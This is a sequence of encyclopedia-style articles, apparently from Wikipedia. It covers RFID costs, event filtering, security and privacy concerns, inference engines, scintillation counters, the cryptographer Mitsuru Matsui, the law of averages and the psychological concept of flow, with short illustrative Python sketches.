In 2007, the lowest cost of Gen2 EPC inlay was offered by the now-defunct company SmartCode, at a price of $0.05 apiece in volumes of 100 million or more.[124]
Not every successful reading of a tag (an observation) is useful for business purposes. A large amount of data may be generated that is not useful for managing inventory or other applications. For example, a customer moving a product from one shelf to another, or a pallet load of articles that passes several readers while being moved in a warehouse, are events that do not produce data that are meaningful to an inventory control system.[125]
Event filtering is required to reduce this data inflow to a meaningful depiction of moving goods passing a threshold. Various concepts[example needed] have been designed, mainly offered as middleware performing the filtering from noisy and redundant raw data to significant processed data.[citation needed]
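As a rough sketch of what such middleware filtering might look like, the function below collapses repeated reads of the same tag into single observations. The function name, data layout, and smoothing window are illustrative assumptions, not drawn from any particular RFID middleware product:

```python
def filter_reads(raw_reads, window=3):
    """Collapse noisy, redundant tag reads into single observations.

    raw_reads: list of (timestamp, tag_id) tuples as a reader might emit.
    A tag re-read within `window` seconds of its last read is suppressed.
    """
    last_seen = {}
    events = []
    for ts, tag in sorted(raw_reads):
        if tag not in last_seen or ts - last_seen[tag] > window:
            events.append((ts, tag))  # genuinely new observation
        last_seen[tag] = ts           # refresh the smoothing window
    return events

# Tag "A" read three times in quick succession, then again much later:
reads = [(0, "A"), (1, "A"), (2, "A"), (10, "A"), (1, "B")]
print(filter_reads(reads))  # [(0, 'A'), (1, 'B'), (10, 'A')]
```

Real middleware performs the same reduction at scale, often also correlating reads across multiple readers before passing events to an inventory system.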
The frequencies used for UHF RFID in the USA are, as of 2007, incompatible with those of Europe or Japan. Furthermore, no emerging standard has yet become as universal as the barcode.[126] To address international trade concerns, it is necessary to use a tag that is operational within all of the international frequency domains.
A primary RFID security concern is the illicit tracking of RFID tags. Tags, which are world-readable, pose a risk to both personal location privacy and corporate/military security. Such concerns have been raised with respect to the United States Department of Defense's recent[when?] adoption of RFID tags for supply chain management.[127] More generally, privacy organizations have expressed concerns in the context of ongoing efforts to embed electronic product code (EPC) RFID tags in general-use products. This is mostly a result of the fact that RFID tags can be read, and legitimate transactions with readers can be eavesdropped on, from non-trivial distances. RFID used in access control,[128] payment and eID (e-passport) systems operates at a shorter range than EPC RFID systems but is also vulnerable to skimming and eavesdropping, albeit at shorter distances.[129]
Another method of prevention is the use of cryptography. Rolling codes and challenge–response authentication (CRA) are commonly used to foil monitor-repetition of the messages between the tag and reader, as any messages that have been recorded would prove to be unsuccessful on repeat transmission.[clarification needed] Rolling codes rely upon the tag's ID being changed after each interrogation, while CRA uses software to ask for a cryptographically coded response from the tag. The protocols used during CRA can be symmetric, or may use public key cryptography.[130]
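The challenge–response idea can be sketched in a few lines. This is only an illustration of the principle using a symmetric HMAC, which low-cost passive tags generally lack the power to compute; the key, nonce size, and function names are assumptions for the sketch, not part of any RFID standard:

```python
import hmac
import hashlib
import os

# Shared secret provisioned on both the tag and the reader (symmetric CRA).
SECRET = b"per-tag-secret-key"

def tag_response(challenge: bytes, key: bytes = SECRET) -> bytes:
    # The tag computes a keyed MAC over the reader's fresh challenge.
    return hmac.new(key, challenge, hashlib.sha256).digest()

def reader_verify(challenge: bytes, response: bytes, key: bytes = SECRET) -> bool:
    # The reader recomputes the MAC; a response recorded for an old
    # challenge will not match a newly issued one, defeating replay.
    return hmac.compare_digest(tag_response(challenge, key), response)

challenge = os.urandom(16)                      # fresh nonce per interrogation
resp = tag_response(challenge)
assert reader_verify(challenge, resp)           # legitimate tag passes
assert not reader_verify(os.urandom(16), resp)  # replayed response fails
```

Because the challenge changes on every interrogation, an eavesdropper who records one exchange gains nothing useful for the next.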
While a variety of secure protocols have been suggested for RFID tags, in order to support long read range at low cost, many RFID tags have barely enough power available to support very low-power and therefore simple security protocols such as cover-coding.[131]
Unauthorized reading of RFID tags presents a risk to privacy and to business secrecy.[132] Unauthorized readers can potentially use RFID information to identify or track packages, persons, carriers, or the contents of a package.[130] Several prototype systems are being developed to combat unauthorized reading, including RFID signal interruption,[133] as well as the possibility of legislation, and 700 scientific papers have been published on this matter since 2002.[134] There are also concerns that the database structure of Object Naming Service may be susceptible to infiltration, similar to denial-of-service attacks, after the EPCglobal Network ONS root servers were shown to be vulnerable.[135]
Microchip–induced tumours have been noted during animal trials.[136][137]
In an effort to prevent the passive "skimming" of RFID-enabled cards or passports, the U.S. General Services Administration (GSA) issued a set of test procedures for evaluating electromagnetically opaque sleeves.[138] For shielding products to be in compliance with FIPS-201 guidelines, they must meet or exceed this published standard; compliant products are listed on the website of the U.S. CIO's FIPS-201 Evaluation Program.[139] The United States government requires that when new ID cards are issued, they must be delivered with an approved shielding sleeve or holder.[140] Although many wallets and passport holders are advertised to protect personal information, there is little evidence that RFID skimming is a serious threat; data encryption and the use of EMV chips rather than RFID make this sort of theft rare.[141][142]
There are contradictory opinions as to whether aluminum can prevent the reading of RFID chips. Some people claim that aluminum shielding, essentially creating a Faraday cage, does work.[143] Others claim that simply wrapping an RFID card in aluminum foil only makes transmission more difficult and is not completely effective at preventing it.[144]
Shielding effectiveness depends on the frequency being used. Low-frequency (LowFID) tags, like those used in implantable devices for humans and pets, are relatively resistant to shielding, although thick metal foil will prevent most reads. High-frequency (HighFID) tags (13.56 MHz, used in smart cards and access badges) are sensitive to shielding and are difficult to read when within a few centimetres of a metal surface. Ultra-high-frequency (UHF) tags (used on pallets and cartons) are difficult to read when placed within a few millimetres of a metal surface, although their read range is actually increased when they are spaced 2–4 cm from a metal surface due to positive reinforcement of the reflected wave and the incident wave at the tag.[145]
The use of RFID has engendered considerable controversy, and some consumer privacy advocates have initiated product boycotts. Consumer privacy experts Katherine Albrecht and Liz McIntyre are two prominent critics of the "spychip" technology. The two main privacy concerns regarding RFID are as follows:[citation needed]
Most concerns revolve around the fact that RFID tags affixed to products remain functional even after the products have been purchased and taken home; thus, they may be used for surveillance and other purposes unrelated to their supply chain inventory functions.[146]
The RFID Network responded to these fears in the first episode of their syndicated cable TV series, saying that they are unfounded and letting RF engineers demonstrate how RFID works.[147] They provided images of RF engineers driving an RFID-enabled van around a building and trying to take an inventory of items inside. They also discussed satellite tracking of a passive RFID tag.
The concerns raised may be addressed in part by use of the Clipped Tag, an RFID tag designed to increase privacy for the purchaser of an item, suggested by IBM researchers Paul Moskowitz and Guenter Karjoth. After the point of sale, a person may tear off a portion of the tag. This allows the transformation of a long-range tag into a proximity tag that still may be read, but only at short range – less than a few inches or centimeters. The modification of the tag may be confirmed visually. The tag may still be used later for returns, recalls, or recycling.
However, read range is a function of both the reader and the tag itself. Improvements in technology may increase read ranges for tags. Tags may be read at longer ranges than they are designed for by increasing reader power. The limit on read distance then becomes the signal-to-noise ratio of the signal reflected from the tag back to the reader. Researchers at two security conferences have demonstrated that passive Ultra-HighFID tags normally read at ranges of up to 30 feet can be read at ranges of 50 to 69 feet using suitable equipment.[148][149]
In January 2004, privacy advocates from CASPIAN and the German privacy group FoeBuD were invited to the METRO Future Store in Germany, where an RFID pilot project was implemented. It was uncovered by accident that METRO "Payback" customer loyalty cards contained RFID tags with customer IDs, a fact that was disclosed neither to customers receiving the cards, nor to this group of privacy advocates. This happened despite assurances by METRO that no customer identification data was tracked and all RFID usage was clearly disclosed.[150]
During the UN World Summit on the Information Society (WSIS) in November 2005, Richard Stallman, the founder of the free software movement, protested the use of RFID security cards by covering his card with aluminum foil.[151]
In 2004–2005, the Federal Trade Commission staff conducted a workshop and review of RFID privacy concerns and issued a report recommending best practices.[152]
RFID was one of the main topics of the 2006 Chaos Communication Congress (organized by the Chaos Computer Club in Berlin) and triggered a large press debate. Topics included electronic passports, Mifare cryptography and the tickets for the 2006 FIFA World Cup. Talks showed how the first real-world mass application of RFID at the 2006 FIFA Football World Cup worked. The group monochrom staged a "Hack RFID" song.[153]
Some individuals have grown to fear the loss of rights due to RFID human implantation.
In early 2007, Chris Paget of San Francisco, California, showed that RFID information could be pulled from a US passport card using only $250 worth of equipment. This suggests that, with the information captured, it would be possible to clone such cards.[154]
According to ZDNet, critics believe that RFID will lead to tracking individuals' every movement and will be an invasion of privacy.[155] In the book SpyChips: How Major Corporations and Government Plan to Track Your Every Move by Katherine Albrecht and Liz McIntyre, one is encouraged to "imagine a world of no privacy. Where your every purchase is monitored and recorded in a database and your every belonging is numbered. Where someone many states away or perhaps in another country has a record of everything you have ever bought. What's more, they can be tracked and monitored remotely".[156]
According to an RSA Laboratories FAQ, RFID tags can be destroyed by a standard microwave oven;[157] however, some types of RFID tags, particularly those constructed to radiate using large metallic antennas (in particular RF tags and EPC tags), may catch fire if subjected to this process for too long (as would any metallic item inside a microwave oven). This simple method cannot safely be used to deactivate RFID features in electronic devices, or those implanted in living tissue, because of the risk of damage to the "host". However, the time required is extremely short (a second or two of radiation), and the method works on many other non-electronic and inanimate items long before heat or fire become a concern.[158]
Some RFID tags implement a "kill command" mechanism to permanently and irreversibly disable them. This mechanism can be applied if the chip itself is trusted or the mechanism is known by the person who wants to "kill" the tag.
UHF RFID tags that comply with the EPC Gen2 Class 1 standard usually support this mechanism, while protecting the chip from being killed with a password.[159] Guessing or cracking this 32-bit kill password would not be difficult for a determined attacker.[160]
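Some back-of-the-envelope arithmetic shows why a fixed 32-bit password offers limited protection. The guessing rate below is an assumed figure for illustration only, not a measured property of any reader or tag:

```python
keyspace = 2 ** 32                # number of possible 32-bit kill passwords
guesses_per_second = 1_000        # assumed rate an attacker could try (hypothetical)

worst_case_days = keyspace / guesses_per_second / 86_400
print(f"{keyspace:,} candidate passwords, ~{worst_case_days:.0f} days to try them all")
# On average an attacker succeeds after searching half the keyspace,
# and an offline attack against eavesdropped exchanges could be far faster.
```

Even at this modest assumed rate, exhausting the keyspace takes on the order of weeks, which is well within reach of a motivated attacker with unattended access to tags.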
https://en.wikipedia.org/wiki/Radio_Frequency_Identification
In the field of artificial intelligence, an inference engine is a software component of an intelligent system that applies logical rules to the knowledge base to deduce new information. The first inference engines were components of expert systems. The typical expert system consisted of a knowledge base and an inference engine. The knowledge base stored facts about the world. The inference engine applied logical rules to the knowledge base and deduced new knowledge. This process would iterate, as each new fact in the knowledge base could trigger additional rules in the inference engine. Inference engines work primarily in one of two modes: forward chaining and backward chaining. Forward chaining starts with the known facts and asserts new facts. Backward chaining starts with goals, and works backward to determine what facts must be asserted so that the goals can be achieved.[1]
Additionally, the concept of 'inference' has expanded to include the process through which trained neural networks generate predictions or decisions. In this context, an 'inference engine' could refer to the specific part of the system, or even the hardware, that executes these operations. This type of inference plays a crucial role in various applications, including (but not limited to) image recognition, natural language processing, and autonomous vehicles. The inference phase in these applications is typically characterized by a high volume of data inputs and real-time processing requirements.
The logic that an inference engine uses is typically represented as IF-THEN rules. The general format of such rules is IF <logical expression> THEN <logical expression>. Prior to the development of expert systems and inference engines, artificial intelligence researchers focused on more powerful theorem prover environments that offered much fuller implementations of first-order logic. For example, general statements that included universal quantification (for all X some statement is true) and existential quantification (there exists some X such that some statement is true). What researchers discovered is that the power of these theorem-proving environments was also their drawback. Back in 1965, it was far too easy to create logical expressions that could take an indeterminate or even infinite time to terminate. For example, it is common in universal quantification to make statements over an infinite set such as the set of all natural numbers. Such statements are perfectly reasonable and even required in mathematical proofs, but when included in an automated theorem prover executing on a computer they may cause it to fall into an infinite loop. Focusing on IF-THEN statements (what logicians call modus ponens) still gave developers a very powerful general mechanism to represent logic, but one that could be used efficiently with computational resources. What is more, there is some psychological research that indicates humans also tend to favor IF-THEN representations when storing complex knowledge.[2]
A simple example of modus ponens often used in introductory logic books is "If you are human then you are mortal". This can be represented in pseudocode as:

Rule1: Human(x) => Mortal(x)
A trivial example of how this rule would be used in an inference engine is as follows. In forward chaining, the inference engine would find any facts in the knowledge base that matched Human(x), and for each fact it found would add the new information Mortal(x) to the knowledge base. So if it found an object called Socrates that was human, it would deduce that Socrates was mortal. In backward chaining, the system would be given a goal, e.g. answer the question: is Socrates mortal? It would search through the knowledge base and determine if Socrates was human and, if so, would assert he is also mortal. However, in backward chaining a common technique was to integrate the inference engine with a user interface. In that way, rather than simply being automated, the system could now be interactive. In this trivial example, if the system was given the goal of answering whether Socrates was mortal and it did not yet know if he was human, it would generate a window to ask the user "Is Socrates human?" and would then use that information accordingly.
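The forward-chaining half of this example can be sketched in a few lines of Python. The tuple-based fact representation and function name are illustrative choices, not how any particular expert system shell stores its knowledge base:

```python
def forward_chain(facts, rules):
    """Naive forward chaining over unary IF-THEN rules.

    facts: set of (predicate, argument) tuples, e.g. ("Human", "Socrates").
    rules: list of (antecedent, consequent) predicate pairs,
           each encoding IF antecedent(x) THEN consequent(x).
    """
    facts = set(facts)
    changed = True
    while changed:                           # iterate until a fixed point
        changed = False
        for ante, cons in rules:
            for pred, arg in list(facts):
                if pred == ante and (cons, arg) not in facts:
                    facts.add((cons, arg))   # assert the new fact
                    changed = True
    return facts

kb = {("Human", "Socrates")}
rules = [("Human", "Mortal")]
print(forward_chain(kb, rules))  # derived facts include ('Mortal', 'Socrates')
```

Backward chaining would instead start from the goal ("Mortal", "Socrates") and search the rules for an antecedent, Human(Socrates), that could establish it.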
This innovation of integrating the inference engine with a user interface led to the second early advancement of expert systems: explanation capabilities. The explicit representation of knowledge as rules rather than code made it possible to generate explanations to users: both explanations in real time and after the fact. So if the system asked the user "Is Socrates human?", the user may wonder why she was being asked that question and the system would use the chain of rules to explain why it was currently trying to ascertain that bit of knowledge: that is, it needs to determine if Socrates is mortal and to do that needs to determine if he is human. At first these explanations were not much different than the standard debugging information that developers deal with when debugging any system. However, an active area of research was utilizing natural language technology to ask, understand, and generate questions and explanations using natural languages rather than computer formalisms.[3]
An inference engine cycles through three sequential steps: match rules, select rules, and execute rules. The execution of the rules will often result in new facts or goals being added to the knowledge base, which will trigger the cycle to repeat. This cycle continues until no new rules can be matched.

In the first step, match rules, the inference engine finds all of the rules that are triggered by the current contents of the knowledge base. In forward chaining, the engine looks for rules where the antecedent (left-hand side) matches some fact in the knowledge base. In backward chaining, the engine looks for antecedents that can satisfy one of the current goals.

In the second step, select rules, the inference engine prioritizes the various rules that were matched to determine the order in which to execute them. In the final step, execute rules, the engine executes each matched rule in the order determined in step two and then iterates back to step one again. The cycle continues until no new rules are matched.[4]
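The match-select-execute cycle can be made concrete with a minimal Python sketch. The numeric-priority selection strategy below is an assumption for illustration (the text only says matched rules are prioritized somehow), and the rules themselves are invented:

```python
# Illustrative match-select-execute cycle over trivial single-fact rules.
facts = {"A"}
# Each rule: (priority, antecedent fact, consequent fact)
rules = [(1, "A", "B"), (2, "B", "C"), (0, "A", "D")]

while True:
    # 1. match: rules whose antecedent holds and whose consequent is new
    matched = [r for r in rules if r[1] in facts and r[2] not in facts]
    if not matched:
        break  # no new rules can be matched -> cycle stops
    # 2. select: order the matched rules, here by descending priority
    matched.sort(key=lambda r: r[0], reverse=True)
    # 3. execute: fire each rule, adding its consequent to the knowledge base
    for _, _, consequent in matched:
        facts.add(consequent)

print(sorted(facts))  # ['A', 'B', 'C', 'D']
```

Note how firing the rules in the first pass adds "B", which causes rule (2, "B", "C") to match on the next pass; the loop ends only when a full match phase produces nothing new.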
Early inference engines focused primarily on forward chaining. These systems were usually implemented in the Lisp programming language. Lisp was a frequent platform for early AI research due to its strong capability for symbolic manipulation. Also, as an interpreted language it offered productive development environments appropriate to debugging complex programs. A necessary consequence of these benefits was that Lisp programs tended to be slower and less robust than compiled languages of the time such as C. A common approach in these early days was to take an expert system application and repackage the inference engine used for that system as a reusable tool other researchers could use for the development of other expert systems. For example, MYCIN was an early expert system for medical diagnosis, and EMYCIN was an inference engine extrapolated from MYCIN and made available for other researchers.[1]

As expert systems moved from research prototypes to deployed systems there was more focus on issues such as speed and robustness. One of the first and most popular forward chaining engines was OPS5, which used the Rete algorithm to optimize the efficiency of rule firing. Another very popular technology that was developed was the Prolog logic programming language. Prolog focused primarily on backward chaining and also featured various commercial versions and optimizations for efficiency and robustness.[5]
As expert systems prompted significant interest from the business world, various companies, many of them started or guided by prominent AI researchers, created productized versions of inference engines. For example, Intellicorp was initially guided by Edward Feigenbaum. These inference engine products were also often developed in Lisp at first. However, demands for more affordable and commercially viable platforms eventually made personal computer platforms very popular.
ClipsRules and RefPerSys (inspired by CAIA[6] and the work of Jacques Pitrat) are examples of inference engines. The Frama-C static source code analyzer also uses some inference engine techniques.
|
https://en.wikipedia.org/wiki/Inference_engine
|
A scintillation counter is an instrument for detecting and measuring ionizing radiation by using the excitation effect of incident radiation on a scintillating material, and detecting the resultant light pulses.

It consists of a scintillator which generates photons in response to incident radiation; a sensitive photodetector (usually a photomultiplier tube (PMT), a charge-coupled device (CCD) camera, or a photodiode), which converts the light to an electrical signal; and electronics to process this signal.

Scintillation counters are widely used in radiation protection, assay of radioactive materials and physics research because they can be made inexpensively yet with good quantum efficiency, and can measure both the intensity and the energy of incident radiation.

The first electronic scintillation counter was invented in 1944 by Sir Samuel Curran[1][2] whilst he was working on the Manhattan Project at the University of California at Berkeley. There was a requirement to measure the radiation from small quantities of uranium, and his innovation was to use one of the newly available highly sensitive photomultiplier tubes made by the Radio Corporation of America to accurately count the flashes of light from a scintillator subjected to radiation.
This built upon the work of earlier researchers such as Antoine Henri Becquerel, who discovered radioactivity whilst working on the phosphorescence of uranium salts in 1896. Previously, scintillation events had to be laboriously detected by eye, using a spinthariscope (a simple microscope) to observe light flashes in the scintillator. The first commercial liquid scintillation counter was made by Lyle E. Packard and sold to Argonne Cancer Research Hospital at the University of Chicago in 1953. The production model was designed especially for tritium and carbon-14, which were used in metabolic studies in vivo and in vitro.[3]

When an ionizing particle passes into the scintillator material, atoms are excited along a track. For charged particles the track is the path of the particle itself. For gamma rays (uncharged), their energy is converted to an energetic electron via either the photoelectric effect, Compton scattering or pair production.

The chemistry of atomic de-excitation in the scintillator produces a multitude of low-energy photons, typically near the blue end of the visible spectrum. The quantity is proportional to the energy deposited by the ionizing particle. These can be directed to the photocathode of a photomultiplier tube, which emits at most one electron for each arriving photon due to the photoelectric effect. This group of primary electrons is electrostatically accelerated and focused by an electrical potential so that they strike the first dynode of the tube. The impact of a single electron on the dynode releases a number of secondary electrons which are in turn accelerated to strike the second dynode. Each subsequent dynode impact releases further electrons, and so there is a current-amplifying effect at each dynode stage. Each stage is at a higher potential than the previous to provide the accelerating field.
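The multiplicative effect of the dynode chain is easy to quantify with a back-of-envelope calculation. The secondary-emission yield and stage count below are typical illustrative values, not figures from the text:

```python
# Back-of-envelope photomultiplier gain: each dynode multiplies the
# electron count by its secondary-emission yield, so the stages compound.
secondary_yield = 5   # electrons released per electron striking a dynode (illustrative)
n_dynodes = 10        # tubes commonly have on the order of 10 stages

gain = secondary_yield ** n_dynodes  # total current amplification at the anode
print(f"{gain:.2e}")  # 9.77e+06: one photoelectron becomes ~10 million electrons
```

This exponential compounding is why a single photoelectron at the photocathode yields a measurable current pulse at the anode.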
The resultant output signal at the anode is a measurable pulse for each group of photons from an original ionizing event in the scintillator that arrived at the photocathode, and carries information about the energy of the original incident radiation. When it is fed to a charge amplifier which integrates the energy information, an output pulse is obtained which is proportional to the energy of the particle exciting the scintillator.
The number of such pulses per unit time also gives information about the intensity of the radiation. In some applications individual pulses are not counted, but rather only the average current at the anode is used as a measure of radiation intensity.
The scintillator must be shielded from all ambient light so that external photons do not swamp the ionization events caused by incident radiation. To achieve this a thin opaque foil, such as aluminized mylar, is often used, though it must have a low enough mass to minimize undue attenuation of the incident radiation being measured.
The article on the photomultiplier tube carries a detailed description of the tube's operation.

The scintillator consists of a transparent crystal, usually a phosphor, plastic (usually containing anthracene) or organic liquid (see liquid scintillation counting) that fluoresces when struck by ionizing radiation.

Cesium iodide (CsI) in crystalline form is used as the scintillator for the detection of protons and alpha particles. Sodium iodide (NaI) containing a small amount of thallium is used as a scintillator for the detection of gamma rays, and zinc sulfide (ZnS) is widely used as a detector of alpha particles. Zinc sulfide is the material Rutherford used to perform his scattering experiment. Lithium iodide (LiI) is used in neutron detectors.

The quantum efficiency of a gamma-ray detector (per unit volume) depends upon the density of electrons in the detector, and certain scintillating materials, such as sodium iodide and bismuth germanate, achieve high electron densities as a result of the high atomic numbers of some of the elements of which they are composed. However, detectors based on semiconductors, notably hyperpure germanium, have better intrinsic energy resolution than scintillators, and are preferred where feasible for gamma-ray spectrometry.

In the case of neutron detectors, high efficiency is gained through the use of scintillating materials rich in hydrogen that scatter neutrons efficiently. Liquid scintillation counters are an efficient and practical means of quantifying beta radiation.

Scintillation counters are used to measure radiation in a variety of applications including hand-held radiation survey meters, personnel and environmental monitoring for radioactive contamination, medical imaging, radiometric assay, nuclear security and nuclear plant safety.
Several products have been introduced in the market utilising scintillation counters for detection of potentially dangerous gamma-emitting materials during transport. These include scintillation counters designed for freight terminals, border security, ports, weigh bridge applications, scrap metal yards and contamination monitoring of nuclear waste. There are variants of scintillation counters mounted on pick-up trucks and helicopters for rapid response in case of a security situation due to dirty bombs or radioactive waste.[4][5] Hand-held units are also commonly used.[6]

In the United Kingdom, the Health and Safety Executive, or HSE, has issued a user guidance note on selecting the correct radiation measurement instrument for the application concerned. This covers all radiation instrument technologies, and is a useful comparative guide to the use of scintillation detectors.[7]

Radioactive contamination monitors, for area or personal surveys, require a large detection area to ensure efficient and rapid coverage of monitored surfaces. For this a thin scintillator with a large area window and an integrated photomultiplier tube is ideally suited. They find wide application in the field of radioactive contamination monitoring of personnel and the environment. Detectors are designed to have one or two scintillation materials, depending on the application. "Single phosphor" detectors are used for either alpha or beta, and "dual phosphor" detectors are used to detect both.[8]

A scintillator such as zinc sulphide is used for alpha particle detection, whilst plastic scintillators are used for beta detection. The resultant scintillation energies can be discriminated so that alpha and beta counts can be measured separately with the same detector.[8] This technique is used in both hand-held and fixed monitoring equipment, and such instruments are relatively inexpensive compared with the gas proportional detector.
Scintillation materials are used for ambient gamma dose measurement, though a different construction is used from that for contamination detection, as no thin window is required.

Scintillators often convert a single photon of high-energy radiation into a large number of lower-energy photons, where the number of photons per megaelectronvolt of input energy is fairly constant. By measuring the intensity of the flash (the number of photons produced by the x-ray or gamma photon) it is therefore possible to discern the original photon's energy.

The spectrometer consists of a suitable scintillator crystal, a photomultiplier tube, and a circuit for measuring the height of the pulses produced by the photomultiplier. The pulses are counted and sorted by their height, producing an x-y plot of scintillator flash brightness vs number of flashes, which approximates the energy spectrum of the incident radiation, with some additional artifacts. Monochromatic gamma radiation produces a photopeak at its energy. The detector also shows response at lower energies, caused by Compton scattering, two smaller escape peaks at energies 0.511 and 1.022 MeV below the photopeak for the creation of electron-positron pairs when one or both annihilation photons escape, and a backscatter peak. Higher energies can be measured when two or more photons strike the detector almost simultaneously (pile-up, within the time resolution of the data acquisition chain), appearing as sum peaks with energies up to the value of two or more photopeaks added.[8]
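The escape-peak positions follow directly from the 0.511 MeV electron rest energy: each annihilation photon that escapes the detector carries off exactly that much. A small illustrative helper (the function name and the Tl-208 example line are our own choices, not from the text) makes the arithmetic explicit:

```python
# Single- and double-escape peak positions for a gamma spectrum.
M_E = 0.511  # electron rest energy in MeV

def escape_peaks(photopeak_mev):
    """Return (single-escape, double-escape) energies in MeV, or None.

    Pair production, and hence escape peaks, only occurs when the photon
    energy exceeds 2 * 0.511 MeV = 1.022 MeV.
    """
    if photopeak_mev <= 2 * M_E:
        return None
    return (photopeak_mev - M_E, photopeak_mev - 2 * M_E)

# Example: the well-known 2.614 MeV gamma line of Tl-208
print(tuple(round(e, 3) for e in escape_peaks(2.614)))  # (2.103, 1.592)
```

For lines below 1.022 MeV the helper returns None, matching the physics: no electron-positron pair can be created, so no escape peaks appear.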
|
https://en.wikipedia.org/wiki/Scintillation_counter
|
Mitsuru Matsui (松井 充, Matsui Mitsuru, born September 16, 1961) is a Japanese cryptographer and senior researcher for Mitsubishi Electric Company.

While researching error-correcting codes in 1990, Matsui was inspired by Eli Biham and Adi Shamir's differential cryptanalysis, and discovered the technique of linear cryptanalysis, published in 1993. Differential and linear cryptanalysis are the two major general techniques known for the cryptanalysis of block ciphers.

The following year, Matsui was the first to publicly report an experimental cryptanalysis of DES, using the computing power of twelve workstations over a period of fifty days.

He is also the author of the MISTY1 and MISTY2 block ciphers, and contributed to the design of Camellia and KASUMI.

For his achievements, Matsui received the 2012 RSA Conference Award for Excellence in Mathematics.
|
https://en.wikipedia.org/wiki/Mitsuru_Matsui
|
The law of averages is the commonly held belief that a particular outcome or event will, over certain periods of time, occur at a frequency that is similar to its probability.[1][2] Depending on context or application it can be considered a valid common-sense observation or a misunderstanding of probability. This notion can lead to the gambler's fallacy when one becomes convinced that a particular outcome must come soon simply because it has not occurred recently (e.g. believing that because three consecutive coin flips yielded heads, the next coin flip must be virtually guaranteed to be tails).

As invoked in everyday life, the "law" usually reflects wishful thinking or a poor understanding of statistics rather than any mathematical principle. While there is a real theorem (the law of large numbers) that a random variable will reflect its underlying probability over a very large sample, the law of averages typically assumes that an unnatural short-term "balance" must occur.[3] Typical applications also generally assume no bias in the underlying probability distribution, which is frequently at odds with the empirical evidence.[4]

The gambler's fallacy is a particular misapplication of the law of averages in which the gambler believes that a particular outcome is more likely because it has not happened recently, or (conversely) that because a particular outcome has recently occurred, it will be less likely in the immediate future.[5]
As an example, consider a roulette wheel that has landed on red in three consecutive spins. An onlooker might apply the law of averages to conclude that on its next spin it is guaranteed (or at least is much more likely) to land on black. Of course, the wheel has no memory and its probabilities do not change according to past results. So even if the wheel has landed on red in ten or a hundred consecutive spins, the probability that the next spin will be black is still no more than 48.6% (assuming a fair European wheel with only one green zero; it would be exactly 50% if there were no green zero and the wheel were fair, and 47.4% for a fair American wheel with one green "0" and one green "00"). Similarly, there is no statistical basis for the belief that lottery numbers which haven't appeared recently are due to appear soon. (There is some value in choosing lottery numbers that are, in general, less popular than others: not because they are any more or less likely to come up, but because the largest prizes are usually shared among all of the people who chose the winning numbers. The unpopular numbers are just as likely to come up as the popular numbers are, and in the event of a big win, one would likely have to share it with fewer other people. See parimutuel betting.)
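The percentages quoted for the roulette example are simple pocket counts; a one-line helper reproduces them (the helper itself is illustrative):

```python
# Probability that the next spin lands on black, for a fair wheel:
# 18 black pockets out of however many pockets the wheel has.
def p_black(pockets_black=18, pockets_total=37):
    return pockets_black / pockets_total

print(f"European (one zero):  {p_black(18, 37):.1%}")  # 48.6%
print(f"No zeros:             {p_black(18, 36):.1%}")  # 50.0%
print(f"American (0 and 00):  {p_black(18, 38):.1%}")  # 47.4%
```

The probability is the same on every spin regardless of history, which is exactly why the onlooker's "law of averages" reasoning fails.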
Another application of the law of averages is a belief that a sample's behaviour must line up with the expected value based on population statistics. For example, suppose a fair coin is flipped 100 times. Using the law of averages, one might predict that there will be 50 heads and 50 tails. While this is the single most likely outcome, there is only an 8% chance of it occurring, according to the binomial distribution: P(X = 50 | n = 100, p = 0.5) ≈ 0.08. Predictions based on the law of averages are even less useful if the sample does not reflect the population.
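The ~8% figure comes straight from the binomial probability mass function, which can be checked with the standard library:

```python
from math import comb

# P(exactly 50 heads in 100 fair flips) = C(100, 50) / 2**100
n, k = 100, 50
p = comb(n, k) / 2 ** n
print(f"{p:.4f}")  # 0.0796
```

So even the single most likely outcome occurs less than 8% of the time, which is the article's point: the "expected" 50/50 split is far from guaranteed in any one sample.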
In this example, one tries to increase the probability of a rare event occurring at least once by carrying out more trials. For example, a job seeker might argue, "If I send my résumé to enough places, the law of averages says that someone will eventually hire me." Assuming a non-zero probability, it is true that conducting more trials increases the overall likelihood of the desired outcome. However, there is no particular number of trials that guarantees that outcome; rather, the probability that it will already have occurred approaches, but never quite reaches, 100%.
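The "approaches but never reaches 100%" claim follows from the complement rule: with per-trial success probability p, the chance of at least one success in n independent trials is 1 - (1 - p)^n. A quick sketch (the 1% per-trial probability is an invented example):

```python
# Probability of at least one success in n independent trials,
# each succeeding with probability p. Approaches 1 but never reaches it.
def p_at_least_one(p, n):
    return 1 - (1 - p) ** n

for n in (10, 100, 1000):
    print(n, round(p_at_least_one(0.01, n), 4))
# 10 -> 0.0956, 100 -> 0.634, 1000 -> 1.0 (rounded; the true value is still < 1)
```

No finite n makes the result exactly 1 (as long as p < 1), matching the text: more résumés help, but no number of them guarantees a job.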
The Steve Goodman song "A Dying Cub Fan's Last Request" mentions the law of averages in reference to the Chicago Cubs' lack of championship success. At the time Goodman recorded the song in 1981, the Cubs had not won a National League championship since 1945, and had not won a World Series since 1908. This futility would continue until the Cubs finally won both in 2016.
|
https://en.wikipedia.org/wiki/Law_of_averages
|
Flow in positive psychology, also known colloquially as being in the zone or locked in, is the mental state in which a person performing some activity is fully immersed in a feeling of energized focus, full involvement, and enjoyment in the process of the activity. In essence, flow is characterized by complete absorption in what one does, and a resulting transformation in one's sense of time.[1] Flow is the melting together of action and consciousness; the state of finding a balance between a skill and how challenging that task is. It requires a high level of concentration. Flow is used as a coping skill for stress and anxiety when productively pursuing a form of leisure that matches one's skill set.[2]

First presented in the 1975 book Beyond Boredom and Anxiety by the Hungarian-American psychologist Mihály Csíkszentmihályi,[3][4] the concept has been widely referred to across a variety of fields (and is particularly well recognized in occupational therapy).

The flow state shares many characteristics with hyperfocus.[5] However, hyperfocus is not always described in a positive light. Some examples include spending "too much" time playing video games or becoming pleasurably absorbed by one aspect of an assignment or task to the detriment of the overall assignment. In some cases, hyperfocus can "capture" a person, perhaps causing them to appear unfocused or to start several projects but complete few. Hyperfocus is often mentioned "in the context of autism, schizophrenia, and attention deficit hyperactivity disorder – conditions that have consequences on attentional abilities."[5]

Flow is an individual experience, and the idea behind flow originated from the sports-psychology theory about an Individual Zone of Optimal Functioning. The individuality of the concept of flow suggests that each person has their own subjective area of flow, where they would function best given the situation. One is most likely to experience flow at moderate levels of psychological arousal, as one is then unlikely to be overwhelmed, yet not understimulated to the point of boredom.[6]
Flow is so named because, during Csíkszentmihályi's 1975 interviews, several people described their "flow" experiences using the metaphor of a water current carrying them along:
